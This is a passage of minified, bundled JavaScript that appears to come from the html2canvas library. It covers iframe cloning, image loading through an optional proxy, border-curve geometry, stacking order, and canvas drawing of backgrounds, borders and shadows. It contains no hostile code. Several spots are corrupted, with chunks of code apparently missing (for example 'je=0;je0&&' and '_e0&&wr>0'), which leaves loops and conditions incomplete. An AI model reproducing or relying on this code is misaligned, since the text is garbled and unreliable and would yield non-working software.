iframe");var je=_e.document;_e.onload=fe.onload=function(){_e.onload=fe.onload=null;var tt=setInterval(function(){je.body.childNodes.length>0&&"complete"===je.readyState&&(clearInterval(tt),ce(fe))},50)}})},W7=["all","d","content"],H_=function(fe,ce){for(var ge=fe.length-1;ge>=0;ge--){var _e=fe.item(ge);-1===W7.indexOf(_e)&&ce.style.setProperty(_e,fe.getPropertyValue(_e))}return ce},aE=function(fe){var ce="";return fe&&(ce+=""),ce},$M=function(fe,ce,ge){fe&&fe.defaultView&&(ce!==fe.defaultView.pageXOffset||ge!==fe.defaultView.pageYOffset)&&fe.defaultView.scrollTo(ce,ge)},L0=function(fe){var ce=fe[0],_e=fe[2];ce.scrollLeft=fe[1],ce.scrollTop=_e},EC="___html2canvas___pseudoelement_before",DC="___html2canvas___pseudoelement_after",nE='{\n content: "" !important;\n display: none !important;\n}',z0=function(fe){xC(fe,"."+EC+":before"+nE+"\n ."+DC+":after"+nE)},xC=function(fe,ce){var ge=fe.ownerDocument;if(ge){var _e=ge.createElement("style");_e.textContent=ce,fe.appendChild(_e)}},wC=function(){function fe(){}return fe.getOrigin=function(ce){var ge=fe._link;return ge?(ge.href=ce,ge.href=ge.href,ge.protocol+ge.hostname+ge.port):"about:blank"},fe.isSameOrigin=function(ce){return fe.getOrigin(ce)===fe._origin},fe.setContext=function(ce){fe._link=ce.document.createElement("a"),fe._origin=fe.getOrigin(ce.location.href)},fe._origin="about:blank",fe}(),KM=function(){function fe(ce,ge){this.context=ce,this._options=ge,this._cache={}}return fe.prototype.addImage=function(ce){var ge=Promise.resolve();return this.has(ce)||(RC(ce)||rE(ce))&&(this._cache[ce]=this.loadImage(ce)).catch(function(){}),ge},fe.prototype.match=function(ce){return this._cache[ce]},fe.prototype.loadImage=function(ce){return j(this,void 0,void 0,function(){var ge,_e,je,tt,dt=this;return Q(this,function(_t){switch(_t.label){case 0:return ge=wC.isSameOrigin(ce),_e=!IC(ce)&&!0===this._options.useCORS&&ps.SUPPORT_CORS_IMAGES&&!ge,je=!IC(ce)&&!ge&&!RC(ce)&&"string"==typeof this._options.proxy&&ps.SUPPORT_CORS_XHR&&!_e,ge||!1!==this._options.allowTaint||IC(ce)||RC(ce)||je||_e?(tt=ce,je?[4,this.proxy(tt)]:[3,2]):[2];case 1:tt=_t.sent(),_t.label=2;case 2:return this.context.logger.debug("Added image "+ce.substring(0,256)),[4,new Promise(function(gt,kt){var Lt=new Image;Lt.onload=function(){return gt(Lt)},Lt.onerror=kt,(sE(tt)||_e)&&(Lt.crossOrigin="anonymous"),Lt.src=tt,!0===Lt.complete&&setTimeout(function(){return gt(Lt)},500),dt._options.imageTimeout>0&&setTimeout(function(){return kt("Timed out ("+dt._options.imageTimeout+"ms) loading image")},dt._options.imageTimeout)})];case 3:return[2,_t.sent()]}})})},fe.prototype.has=function(ce){return void 0!==this._cache[ce]},fe.prototype.keys=function(){return Promise.resolve(Object.keys(this._cache))},fe.prototype.proxy=function(ce){var ge=this,_e=this._options.proxy;if(!_e)throw new Error("No proxy defined");var je=ce.substring(0,256);return new Promise(function(tt,dt){var _t=ps.SUPPORT_RESPONSE_TYPE?"blob":"text",gt=new XMLHttpRequest;gt.onload=function(){if(200===gt.status)if("text"===_t)tt(gt.response);else{var Ht=new FileReader;Ht.addEventListener("load",function(){return tt(Ht.result)},!1),Ht.addEventListener("error",function(ui){return dt(ui)},!1),Ht.readAsDataURL(gt.response)}else dt("Failed to proxy resource "+je+" with status code "+gt.status)},gt.onerror=dt;var kt=_e.indexOf("?")>-1?"&":"?";if(gt.open("GET",""+_e+kt+"url="+encodeURIComponent(ce)+"&responseType="+_t),"text"!==_t&> instanceof XMLHttpRequest&&(gt.responseType=_t),ge._options.imageTimeout){var Lt=ge._options.imageTimeout;gt.timeout=Lt,gt.ontimeout=function(){return dt("Timed out ("+Lt+"ms) proxying "+je)}}gt.send()})},fe}(),XM=/^data:image\/svg\+xml/i,ph=/^data:image\/.*;base64,/i,oE=/^data:image\/.*/i,rE=function(fe){return ps.SUPPORT_SVG_DRAWING||!Hc(fe)},IC=function(fe){return oE.test(fe)},sE=function(fe){return ph.test(fe)},RC=function(fe){return"blob"===fe.substr(0,4)},Hc=function(fe){return"svg"===fe.substr(-3).toLowerCase()||XM.test(fe)},Fi=function(){function fe(ce,ge){this.type=0,this.x=ce,this.y=ge}return fe.prototype.add=function(ce,ge){return new fe(this.x+ce,this.y+ge)},fe}(),Uf=function(fe,ce,ge){return new Fi(fe.x+(ce.x-fe.x)*ge,fe.y+(ce.y-fe.y)*ge)},W0=function(){function fe(ce,ge,_e,je){this.type=1,this.start=ce,this.startControl=ge,this.endControl=_e,this.end=je}return fe.prototype.subdivide=function(ce,ge){var _e=Uf(this.start,this.startControl,ce),je=Uf(this.startControl,this.endControl,ce),tt=Uf(this.endControl,this.end,ce),dt=Uf(_e,je,ce),_t=Uf(je,tt,ce),gt=Uf(dt,_t,ce);return ge?new fe(this.start,_e,dt,gt):new fe(gt,_t,tt,this.end)},fe.prototype.add=function(ce,ge){return new fe(this.start.add(ce,ge),this.startControl.add(ce,ge),this.endControl.add(ce,ge),this.end.add(ce,ge))},fe.prototype.reverse=function(){return new fe(this.end,this.endControl,this.startControl,this.start)},fe}(),bl=function(fe){return 1===fe.type},cE=function fe(ce){var ge=ce.styles,_e=ce.bounds,je=wo(ge.borderTopLeftRadius,_e.width,_e.height),tt=je[0],dt=je[1],_t=wo(ge.borderTopRightRadius,_e.width,_e.height),gt=_t[0],kt=_t[1],Lt=wo(ge.borderBottomRightRadius,_e.width,_e.height),Ht=Lt[0],ui=Lt[1],Ki=wo(ge.borderBottomLeftRadius,_e.width,_e.height),Ni=Ki[0],Ui=Ki[1],dn=[];dn.push((tt+gt)/_e.width),dn.push((Ni+Ht)/_e.width),dn.push((dt+Ui)/_e.height),dn.push((kt+ui)/_e.height);var ta=Math.max.apply(Math,dn);ta>1&&(tt/=ta,dt/=ta,gt/=ta,kt/=ta,Ht/=ta,ui/=ta,Ni/=ta,Ui/=ta);var na=_e.width-gt,To=_e.height-ui,Mn=_e.width-Ht,qa=_e.height-Ui,Qi=ge.borderTopWidth,ro=ge.borderRightWidth,Yn=ge.borderBottomWidth,Ka=ge.borderLeftWidth,Sr=_n(ge.paddingTop,ce.bounds.width),qc=_n(ge.paddingRight,ce.bounds.width),Gc=_n(ge.paddingBottom,ce.bounds.width),On=_n(ge.paddingLeft,ce.bounds.width);this.topLeftBorderDoubleOuterBox=tt>0||dt>0?hr(_e.left+Ka/3,_e.top+Qi/3,tt-Ka/3,dt-Qi/3,Io.TOP_LEFT):new Fi(_e.left+Ka/3,_e.top+Qi/3),this.topRightBorderDoubleOuterBox=tt>0||dt>0?hr(_e.left+na,_e.top+Qi/3,gt-ro/3,kt-Qi/3,Io.TOP_RIGHT):new Fi(_e.left+_e.width-ro/3,_e.top+Qi/3),this.bottomRightBorderDoubleOuterBox=Ht>0||ui>0?hr(_e.left+Mn,_e.top+To,Ht-ro/3,ui-Yn/3,Io.BOTTOM_RIGHT):new Fi(_e.left+_e.width-ro/3,_e.top+_e.height-Yn/3),this.bottomLeftBorderDoubleOuterBox=Ni>0||Ui>0?hr(_e.left+Ka/3,_e.top+qa,Ni-Ka/3,Ui-Yn/3,Io.BOTTOM_LEFT):new Fi(_e.left+Ka/3,_e.top+_e.height-Yn/3),this.topLeftBorderDoubleInnerBox=tt>0||dt>0?hr(_e.left+2*Ka/3,_e.top+2*Qi/3,tt-2*Ka/3,dt-2*Qi/3,Io.TOP_LEFT):new Fi(_e.left+2*Ka/3,_e.top+2*Qi/3),this.topRightBorderDoubleInnerBox=tt>0||dt>0?hr(_e.left+na,_e.top+2*Qi/3,gt-2*ro/3,kt-2*Qi/3,Io.TOP_RIGHT):new Fi(_e.left+_e.width-2*ro/3,_e.top+2*Qi/3),this.bottomRightBorderDoubleInnerBox=Ht>0||ui>0?hr(_e.left+Mn,_e.top+To,Ht-2*ro/3,ui-2*Yn/3,Io.BOTTOM_RIGHT):new Fi(_e.left+_e.width-2*ro/3,_e.top+_e.height-2*Yn/3),this.bottomLeftBorderDoubleInnerBox=Ni>0||Ui>0?hr(_e.left+2*Ka/3,_e.top+qa,Ni-2*Ka/3,Ui-2*Yn/3,Io.BOTTOM_LEFT):new Fi(_e.left+2*Ka/3,_e.top+_e.height-2*Yn/3),this.topLeftBorderStroke=tt>0||dt>0?hr(_e.left+Ka/2,_e.top+Qi/2,tt-Ka/2,dt-Qi/2,Io.TOP_LEFT):new Fi(_e.left+Ka/2,_e.top+Qi/2),this.topRightBorderStroke=tt>0||dt>0?hr(_e.left+na,_e.top+Qi/2,gt-ro/2,kt-Qi/2,Io.TOP_RIGHT):new Fi(_e.left+_e.width-ro/2,_e.top+Qi/2),this.bottomRightBorderStroke=Ht>0||ui>0?hr(_e.left+Mn,_e.top+To,Ht-ro/2,ui-Yn/2,Io.BOTTOM_RIGHT):new Fi(_e.left+_e.width-ro/2,_e.top+_e.height-Yn/2),this.bottomLeftBorderStroke=Ni>0||Ui>0?hr(_e.left+Ka/2,_e.top+qa,Ni-Ka/2,Ui-Yn/2,Io.BOTTOM_LEFT):new Fi(_e.left+Ka/2,_e.top+_e.height-Yn/2),this.topLeftBorderBox=tt>0||dt>0?hr(_e.left,_e.top,tt,dt,Io.TOP_LEFT):new Fi(_e.left,_e.top),this.topRightBorderBox=gt>0||kt>0?hr(_e.left+na,_e.top,gt,kt,Io.TOP_RIGHT):new Fi(_e.left+_e.width,_e.top),this.bottomRightBorderBox=Ht>0||ui>0?hr(_e.left+Mn,_e.top+To,Ht,ui,Io.BOTTOM_RIGHT):new Fi(_e.left+_e.width,_e.top+_e.height),this.bottomLeftBorderBox=Ni>0||Ui>0?hr(_e.left,_e.top+qa,Ni,Ui,Io.BOTTOM_LEFT):new Fi(_e.left,_e.top+_e.height),this.topLeftPaddingBox=tt>0||dt>0?hr(_e.left+Ka,_e.top+Qi,Math.max(0,tt-Ka),Math.max(0,dt-Qi),Io.TOP_LEFT):new Fi(_e.left+Ka,_e.top+Qi),this.topRightPaddingBox=gt>0||kt>0?hr(_e.left+Math.min(na,_e.width-ro),_e.top+Qi,na>_e.width+ro?0:Math.max(0,gt-ro),Math.max(0,kt-Qi),Io.TOP_RIGHT):new Fi(_e.left+_e.width-ro,_e.top+Qi),this.bottomRightPaddingBox=Ht>0||ui>0?hr(_e.left+Math.min(Mn,_e.width-Ka),_e.top+Math.min(To,_e.height-Yn),Math.max(0,Ht-ro),Math.max(0,ui-Yn),Io.BOTTOM_RIGHT):new Fi(_e.left+_e.width-ro,_e.top+_e.height-Yn),this.bottomLeftPaddingBox=Ni>0||Ui>0?hr(_e.left+Ka,_e.top+Math.min(qa,_e.height-Yn),Math.max(0,Ni-Ka),Math.max(0,Ui-Yn),Io.BOTTOM_LEFT):new Fi(_e.left+Ka,_e.top+_e.height-Yn),this.topLeftContentBox=tt>0||dt>0?hr(_e.left+Ka+On,_e.top+Qi+Sr,Math.max(0,tt-(Ka+On)),Math.max(0,dt-(Qi+Sr)),Io.TOP_LEFT):new Fi(_e.left+Ka+On,_e.top+Qi+Sr),this.topRightContentBox=gt>0||kt>0?hr(_e.left+Math.min(na,_e.width+Ka+On),_e.top+Qi+Sr,na>_e.width+Ka+On?0:gt-Ka+On,kt-(Qi+Sr),Io.TOP_RIGHT):new Fi(_e.left+_e.width-(ro+qc),_e.top+Qi+Sr),this.bottomRightContentBox=Ht>0||ui>0?hr(_e.left+Math.min(Mn,_e.width-(Ka+On)),_e.top+Math.min(To,_e.height+Qi+Sr),Math.max(0,Ht-(ro+qc)),ui-(Yn+Gc),Io.BOTTOM_RIGHT):new Fi(_e.left+_e.width-(ro+qc),_e.top+_e.height-(Yn+Gc)),this.bottomLeftContentBox=Ni>0||Ui>0?hr(_e.left+Ka+On,_e.top+qa,Math.max(0,Ni-(Ka+On)),Ui-(Yn+Gc),Io.BOTTOM_LEFT):new Fi(_e.left+Ka+On,_e.top+_e.height-(Yn+Gc))},Io=(()=>{return(fe=Io||(Io={}))[fe.TOP_LEFT=0]="TOP_LEFT",fe[fe.TOP_RIGHT=1]="TOP_RIGHT",fe[fe.BOTTOM_RIGHT=2]="BOTTOM_RIGHT",fe[fe.BOTTOM_LEFT=3]="BOTTOM_LEFT",Io;var fe})(),hr=function(fe,ce,ge,_e,je){var tt=(Math.sqrt(2)-1)/3*4,dt=ge*tt,_t=_e*tt,gt=fe+ge,kt=ce+_e;switch(je){case Io.TOP_LEFT:return new W0(new Fi(fe,kt),new Fi(fe,kt-_t),new Fi(gt-dt,ce),new Fi(gt,ce));case Io.TOP_RIGHT:return new W0(new Fi(fe,ce),new Fi(fe+dt,ce),new Fi(gt,kt-_t),new Fi(gt,kt));case Io.BOTTOM_RIGHT:return new W0(new Fi(gt,ce),new Fi(gt,ce+_t),new Fi(fe+dt,kt),new Fi(fe,kt));default:return new W0(new Fi(gt,kt),new Fi(gt-dt,kt),new Fi(fe,ce+_t),new Fi(fe,ce))}},U_=function(fe){return[fe.topLeftBorderBox,fe.topRightBorderBox,fe.bottomRightBorderBox,fe.bottomLeftBorderBox]},F0=function(fe){return[fe.topLeftPaddingBox,fe.topRightPaddingBox,fe.bottomRightPaddingBox,fe.bottomLeftPaddingBox]},dE=function fe(ce,ge,_e){this.offsetX=ce,this.offsetY=ge,this.matrix=_e,this.type=0,this.target=6},V0=function fe(ce,ge){this.path=ce,this.target=ge,this.type=1},B0=function fe(ce){this.opacity=ce,this.type=2,this.target=6},qf=function(fe){return 1===fe.type},SC=function(fe,ce){return fe.length===ce.length&&fe.some(function(ge,_e){return ge===ce[_e]})},mE=function fe(ce){this.element=ce,this.inlineLevel=[],this.nonInlineLevel=[],this.negativeZIndex=[],this.zeroOrAutoZIndexOrTransformedOrOpacity=[],this.positiveZIndex=[],this.nonPositionedFloats=[],this.nonPositionedInlineLevel=[]},uE=function(){function fe(ce,ge){if(this.container=ce,this.parent=ge,this.effects=[],this.curves=new cE(this.container),this.container.styles.opacity<1&&this.effects.push(new B0(this.container.styles.opacity)),null!==this.container.styles.transform&&this.effects.push(new dE(this.container.bounds.left+this.container.styles.transformOrigin[0].number,this.container.bounds.top+this.container.styles.transformOrigin[1].number,this.container.styles.transform)),0!==this.container.styles.overflowX){var dt=U_(this.curves),_t=F0(this.curves);SC(dt,_t)?this.effects.push(new V0(dt,6)):(this.effects.push(new V0(dt,2)),this.effects.push(new V0(_t,4)))}}return fe.prototype.getEffects=function(ce){for(var ge=-1===[2,3].indexOf(this.container.styles.position),_e=this.parent,je=this.effects.slice(0);_e;){var tt=_e.effects.filter(function(gt){return!qf(gt)});if(ge||0!==_e.container.styles.position||!_e.parent){if(je.unshift.apply(je,tt),ge=-1===[2,3].indexOf(_e.container.styles.position),0!==_e.container.styles.overflowX){var dt=U_(_e.curves),_t=F0(_e.curves);SC(dt,_t)||je.unshift(new V0(_t,6))}}else je.unshift.apply(je,tt);_e=_e.parent}return je.filter(function(gt){return Tr(gt.target,ce)})},fe}(),ZM=function(fe,ce,ge,_e){fe.container.elements.forEach(function(je){var tt=Tr(je.flags,4),dt=Tr(je.flags,2),_t=new uE(je,fe);Tr(je.styles.display,2048)&&_e.push(_t);var gt=Tr(je.flags,8)?[]:_e;if(tt||dt){var kt=tt||je.styles.isPositioned()?ge:ce,Lt=new mE(_t);if(je.styles.isPositioned()||je.styles.opacity<1||je.styles.isTransformed()){var Ht=je.styles.zIndex.order;if(Ht<0){var ui=0;kt.negativeZIndex.some(function(Ni,Ui){return Ht>Ni.element.container.styles.zIndex.order?(ui=Ui,!1):ui>0}),kt.negativeZIndex.splice(ui,0,Lt)}else if(Ht>0){var Ki=0;kt.positiveZIndex.some(function(Ni,Ui){return Ht>=Ni.element.container.styles.zIndex.order?(Ki=Ui+1,!1):Ki>0}),kt.positiveZIndex.splice(Ki,0,Lt)}else kt.zeroOrAutoZIndexOrTransformedOrOpacity.push(Lt)}else je.styles.isFloating()?kt.nonPositionedFloats.push(Lt):kt.nonPositionedInlineLevel.push(Lt);ZM(_t,Lt,tt?Lt:ge,gt)}else je.styles.isInlineLevel()?ce.inlineLevel.push(_t):ce.nonInlineLevel.push(_t),ZM(_t,ce,ge,gt);Tr(je.flags,8)&&H0(je,gt)})},H0=function(fe,ce){for(var ge=fe instanceof Zm?fe.start:1,_e=fe instanceof Zm&&fe.reversed,je=0;je0&&ge.intrinsicHeight>0){var tt=q_(ge),dt=F0(_e);this.path(dt),this.ctx.save(),this.ctx.clip(),this.ctx.drawImage(je,0,0,ge.intrinsicWidth,ge.intrinsicHeight,tt.left,tt.top,tt.width,tt.height),this.ctx.restore()}},ce.prototype.renderNodeContent=function(ge){return j(this,void 0,void 0,function(){var _e,je,tt,dt,_t,Lt,Ht,ui,Ni,Ui,dn,ta,na,To,Mn,qa;return Q(this,function(Qi){switch(Qi.label){case 0:this.applyEffects(ge.getEffects(4)),je=ge.curves,tt=(_e=ge.container).styles,dt=0,_t=_e.textNodes,Qi.label=1;case 1:return dt<_t.length?[4,this.renderTextNode(_t[dt],tt)]:[3,4];case 2:Qi.sent(),Qi.label=3;case 3:return dt++,[3,1];case 4:if(!(_e instanceof Wc))return[3,8];Qi.label=5;case 5:return Qi.trys.push([5,7,,8]),[4,this.context.cache.match(_e.src)];case 6:return na=Qi.sent(),this.renderReplacedElement(_e,je,na),[3,8];case 7:return Qi.sent(),this.context.logger.error("Error loading image "+_e.src),[3,8];case 8:if(_e instanceof P_&&this.renderReplacedElement(_e,je,_e.canvas),!(_e instanceof rh))return[3,12];Qi.label=9;case 9:return Qi.trys.push([9,11,,12]),[4,this.context.cache.match(_e.svg)];case 10:return na=Qi.sent(),this.renderReplacedElement(_e,je,na),[3,12];case 11:return Qi.sent(),this.context.logger.error("Error loading svg "+_e.svg.substring(0,255)),[3,12];case 12:return _e instanceof lh&&_e.tree?[4,new ce(this.context,{scale:this.options.scale,backgroundColor:_e.backgroundColor,x:0,y:0,width:_e.width,height:_e.height}).render(_e.tree)]:[3,14];case 13:Lt=Qi.sent(),_e.width&&_e.height&&this.ctx.drawImage(Lt,0,0,_e.width,_e.height,_e.bounds.left,_e.bounds.top,_e.bounds.width,_e.bounds.height),Qi.label=14;case 14:if(_e instanceof L_&&(Ht=Math.min(_e.bounds.width,_e.bounds.height),_e.type===sh?_e.checked&&(this.ctx.save(),this.path([new Fi(_e.bounds.left+.39363*Ht,_e.bounds.top+.79*Ht),new Fi(_e.bounds.left+.16*Ht,_e.bounds.top+.5549*Ht),new Fi(_e.bounds.left+.27347*Ht,_e.bounds.top+.44071*Ht),new Fi(_e.bounds.left+.39694*Ht,_e.bounds.top+.5649*Ht),new Fi(_e.bounds.left+.72983*Ht,_e.bounds.top+.23*Ht),new Fi(_e.bounds.left+.84*Ht,_e.bounds.top+.34085*Ht),new Fi(_e.bounds.left+.39363*Ht,_e.bounds.top+.79*Ht)]),this.ctx.fillStyle=tr(Cl),this.ctx.fill(),this.ctx.restore()):_e.type===_s&&_e.checked&&(this.ctx.save(),this.ctx.beginPath(),this.ctx.arc(_e.bounds.left+Ht/2,_e.bounds.top+Ht/2,Ht/4,0,2*Math.PI,!0),this.ctx.fillStyle=tr(Cl),this.ctx.fill(),this.ctx.restore())),V7(_e)&&_e.value.length){switch(ui=this.createFontStyle(tt),Ni=this.fontMetrics.getMetrics(Mn=ui[0],ui[1]).baseline,this.ctx.font=Mn,this.ctx.fillStyle=tr(tt.color),this.ctx.textBaseline="alphabetic",this.ctx.textAlign=j_(_e.styles.textAlign),qa=q_(_e),Ui=0,_e.styles.textAlign){case 1:Ui+=qa.width/2;break;case 2:Ui+=qa.width}dn=qa.add(Ui,0,0,-qa.height/2+1),this.ctx.save(),this.path([new Fi(qa.left,qa.top),new Fi(qa.left+qa.width,qa.top),new Fi(qa.left+qa.width,qa.top+qa.height),new Fi(qa.left,qa.top+qa.height)]),this.ctx.clip(),this.renderTextWithLetterSpacing(new Ff(_e.value,dn),tt.letterSpacing,Ni),this.ctx.restore(),this.ctx.textBaseline="alphabetic",this.ctx.textAlign="left"}if(!Tr(_e.styles.display,2048))return[3,20];if(null===_e.styles.listStyleImage)return[3,19];if(0!==(ta=_e.styles.listStyleImage).type)return[3,18];na=void 0,To=ta.url,Qi.label=15;case 15:return Qi.trys.push([15,17,,18]),[4,this.context.cache.match(To)];case 16:return na=Qi.sent(),this.ctx.drawImage(na,_e.bounds.left-(na.width+10),_e.bounds.top),[3,18];case 17:return Qi.sent(),this.context.logger.error("Error loading list-style-image "+To),[3,18];case 18:return[3,20];case 19:ge.listValue&&-1!==_e.styles.listStyleType&&(Mn=this.createFontStyle(tt)[0],this.ctx.font=Mn,this.ctx.fillStyle=tr(tt.color),this.ctx.textBaseline="middle",this.ctx.textAlign="right",qa=new I(_e.bounds.left,_e.bounds.top+_n(_e.styles.paddingTop,_e.bounds.width),_e.bounds.width,tC(tt.lineHeight,tt.fontSize.number)/2+1),this.renderTextWithLetterSpacing(new Ff(ge.listValue,qa),tt.letterSpacing,tC(tt.lineHeight,tt.fontSize.number)/2+2),this.ctx.textBaseline="bottom",this.ctx.textAlign="left"),Qi.label=20;case 20:return[2]}})})},ce.prototype.renderStackContent=function(ge){return j(this,void 0,void 0,function(){var _e,je,tt,dt,_t,gt,kt,Lt,Ht,ui,Ki,Ni,Ui,dn;return Q(this,function(na){switch(na.label){case 0:return Tr(ge.element.container.flags,16),[4,this.renderNodeBackgroundAndBorders(ge.element)];case 1:na.sent(),_e=0,je=ge.negativeZIndex,na.label=2;case 2:return _e0&&wr>0&&(_h=tt.ctx.createRadialGradient(qc+mi,Gc+yc,0,qc+mi,Gc+yc,qs),Gu(Lt.stops,2*qs).forEach(function(Q_){return _h.addColorStop(Q_.stop,tr(Q_.color))}),tt.path(Sr),tt.ctx.fillStyle=_h,qs!==wr?(gh=ge.bounds.left+.5*ge.bounds.width,nc=ge.bounds.top+.5*ge.bounds.height,Ul=1/(Ch=wr/qs),tt.ctx.save(),tt.ctx.translate(gh,nc),tt.ctx.transform(1,0,0,Ch,0,0),tt.ctx.translate(-gh,-nc),tt.ctx.fillRect(qc,Ul*(Gc-nc)+nc,On,Ps*Ul),tt.ctx.restore()):tt.ctx.fill())):(Ni=G_(ge,_e,[null,null,null]),Sr=Ni[0],mi=Ni[1],yc=Ni[2],Ui=uc(Lt.angle,On=Ni[3],Ps=Ni[4]),dn=Ui[0],ta=Ui[1],na=Ui[2],To=Ui[3],Mn=Ui[4],(qa=document.createElement("canvas")).width=On,qa.height=Ps,Qi=qa.getContext("2d"),ro=Qi.createLinearGradient(ta,To,na,Mn),Gu(Lt.stops,dn).forEach(function(Q_){return ro.addColorStop(Q_.stop,tr(Q_.color))}),Qi.fillStyle=ro,Qi.fillRect(0,0,On,Ps),On>0&&Ps>0&&(Yn=tt.ctx.createPattern(qa,"repeat"),tt.renderRepeat(Sr,Yn,mi,yc))),$f.label=6;case 6:return _e--,[2]}})},tt=this,dt=0,_t=ge.styles.backgroundImage.slice(0).reverse(),kt.label=1;case 1:return dt<_t.length?[5,je(_t[dt])]:[3,4];case 2:kt.sent(),kt.label=3;case 3:return dt++,[3,1];case 4:return[2]}})})},ce.prototype.renderSolidBorder=function(ge,_e,je){return j(this,void 0,void 0,function(){return Q(this,function(tt){return this.path(hE(je,_e)),this.ctx.fillStyle=tr(ge),this.ctx.fill(),[2]})})},ce.prototype.renderDoubleBorder=function(ge,_e,je,tt){return j(this,void 0,void 0,function(){var dt,_t;return Q(this,function(gt){switch(gt.label){case 0:return _e<3?[4,this.renderSolidBorder(ge,je,tt)]:[3,2];case 1:return gt.sent(),[2];case 2:return dt=function(fe,ce){switch(ce){case 0:return Ml(fe.topLeftBorderBox,fe.topLeftBorderDoubleOuterBox,fe.topRightBorderBox,fe.topRightBorderDoubleOuterBox);case 1:return Ml(fe.topRightBorderBox,fe.topRightBorderDoubleOuterBox,fe.bottomRightBorderBox,fe.bottomRightBorderDoubleOuterBox);case 2:return Ml(fe.bottomRightBorderBox,fe.bottomRightBorderDoubleOuterBox,fe.bottomLeftBorderBox,fe.bottomLeftBorderDoubleOuterBox);default:return Ml(fe.bottomLeftBorderBox,fe.bottomLeftBorderDoubleOuterBox,fe.topLeftBorderBox,fe.topLeftBorderDoubleOuterBox)}}(tt,je),this.path(dt),this.ctx.fillStyle=tr(ge),this.ctx.fill(),_t=function(fe,ce){switch(ce){case 0:return Ml(fe.topLeftBorderDoubleInnerBox,fe.topLeftPaddingBox,fe.topRightBorderDoubleInnerBox,fe.topRightPaddingBox);case 1:return Ml(fe.topRightBorderDoubleInnerBox,fe.topRightPaddingBox,fe.bottomRightBorderDoubleInnerBox,fe.bottomRightPaddingBox);case 2:return Ml(fe.bottomRightBorderDoubleInnerBox,fe.bottomRightPaddingBox,fe.bottomLeftBorderDoubleInnerBox,fe.bottomLeftPaddingBox);default:return Ml(fe.bottomLeftBorderDoubleInnerBox,fe.bottomLeftPaddingBox,fe.topLeftBorderDoubleInnerBox,fe.topLeftPaddingBox)}}(tt,je),this.path(_t),this.ctx.fill(),[2]}})})},ce.prototype.renderNodeBackgroundAndBorders=function(ge){return j(this,void 0,void 0,function(){var _e,je,tt,dt,_t,gt,kt,Lt,Ht=this;return Q(this,function(ui){switch(ui.label){case 0:return this.applyEffects(ge.getEffects(2)),je=!Oc((_e=ge.container.styles).backgroundColor)||_e.backgroundImage.length,tt=[{style:_e.borderTopStyle,color:_e.borderTopColor,width:_e.borderTopWidth},{style:_e.borderRightStyle,color:_e.borderRightColor,width:_e.borderRightWidth},{style:_e.borderBottomStyle,color:_e.borderBottomColor,width:_e.borderBottomWidth},{style:_e.borderLeftStyle,color:_e.borderLeftColor,width:_e.borderLeftWidth}],dt=B7(jf(_e.backgroundClip,0),ge.curves),je||_e.boxShadow.length?(this.ctx.save(),this.path(dt),this.ctx.clip(),Oc(_e.backgroundColor)||(this.ctx.fillStyle=tr(_e.backgroundColor),this.ctx.fill()),[4,this.renderBackgroundImage(ge.container)]):[3,2];case 1:ui.sent(),this.ctx.restore(),_e.boxShadow.slice(0).reverse().forEach(function(Ki){Ht.ctx.save();var Ni=U_(ge.curves),Ui=Ki.inset?0:1e4,dn=function(fe,ce,ge,_e,je){return fe.map(function(tt,dt){switch(dt){case 0:return tt.add(ce,ge);case 1:return tt.add(ce+_e,ge);case 2:return tt.add(ce+_e,ge+je);case 3:return tt.add(ce,ge+je)}return tt})}(Ni,(Ki.inset?1:-1)*Ki.spread.number-Ui,(Ki.inset?1:-1)*Ki.spread.number,Ki.spread.number*(Ki.inset?-2:2),Ki.spread.number*(Ki.inset?-2:2));Ki.inset?(Ht.path(Ni),Ht.ctx.clip(),Ht.mask(dn)):(Ht.mask(Ni),Ht.ctx.clip(),Ht.path(dn)),Ht.ctx.shadowOffsetX=Ki.offsetX.number+Ui,Ht.ctx.shadowOffsetY=Ki.offsetY.number,Ht.ctx.shadowColor=tr(Ki.color),Ht.ctx.shadowBlur=Ki.blur.number,Ht.ctx.fillStyle=Ki.inset?tr(Ki.color):"rgba(0,0,0,1)",Ht.ctx.fill(),Ht.ctx.restore()}),ui.label=2;case 2:_t=0,gt=0,kt=tt,ui.label=3;case 3:return gt0?2!==Lt.style?[3,5]:[4,this.renderDashedDottedBorder(Lt.color,Lt.width,_t,ge.curves,2)]:[3,11]:[3,13];case 4:return ui.sent(),[3,11];case 5:return 3!==Lt.style?[3,7]:[4,this.renderDashedDottedBorder(Lt.color,Lt.width,_t,ge.curves,3)];case 6:return ui.sent(),[3,11];case 7:return 4!==Lt.style?[3,9]:[4,this.renderDoubleBorder(Lt.color,Lt.width,_t,ge.curves)];case 8:return ui.sent(),[3,11];case 9:return[4,this.renderSolidBorder(Lt.color,_t,ge.curves)];case 10:ui.sent(),ui.label=11;case 11:_t++,ui.label=12;case 12:return gt++,[3,3];case 13:return[2]}})})},ce.prototype.renderDashedDottedBorder=function(ge,_e,je,tt,dt){return j(this,void 0,void 0,function(){var _t,gt,kt,Lt,Ht,ui,Ki,Ni,Ui,dn,ta,na,To,Mn,qa,Qi;return Q(this,function(ro){return this.ctx.save(),_t=function(fe,ce){switch(ce){case 0:return U0(fe.topLeftBorderStroke,fe.topRightBorderStroke);case 1:return U0(fe.topRightBorderStroke,fe.bottomRightBorderStroke);case 2:return U0(fe.bottomRightBorderStroke,fe.bottomLeftBorderStroke);default:return U0(fe.bottomLeftBorderStroke,fe.topLeftBorderStroke)}}(tt,je),gt=hE(tt,je),2===dt&&(this.path(gt),this.ctx.clip()),bl(gt[0])?(kt=gt[0].start.x,Lt=gt[0].start.y):(kt=gt[0].x,Lt=gt[0].y),bl(gt[1])?(Ht=gt[1].end.x,ui=gt[1].end.y):(Ht=gt[1].x,ui=gt[1].y),Ki=0===je||2===je?Math.abs(kt-Ht):Math.abs(Lt-ui),this.ctx.beginPath(),this.formatPath(3===dt?_t:gt.slice(0,2)),Ni=_e<3?3*_e:2*_e,Ui=_e<3?2*_e:_e,3===dt&&(Ni=_e,Ui=_e),dn=!0,Ki<=2*Ni?dn=!1:Ki<=2*Ni+Ui?(Ni*=ta=Ki/(2*Ni+Ui),Ui*=ta):(na=Math.floor((Ki+Ui)/(Ni+Ui)),To=(Ki-na*Ni)/(na-1),Ui=(Mn=(Ki-(na+1)*Ni)/na)<=0||Math.abs(Ui-To){we.read=function(de,ie,j,Q,ae){var 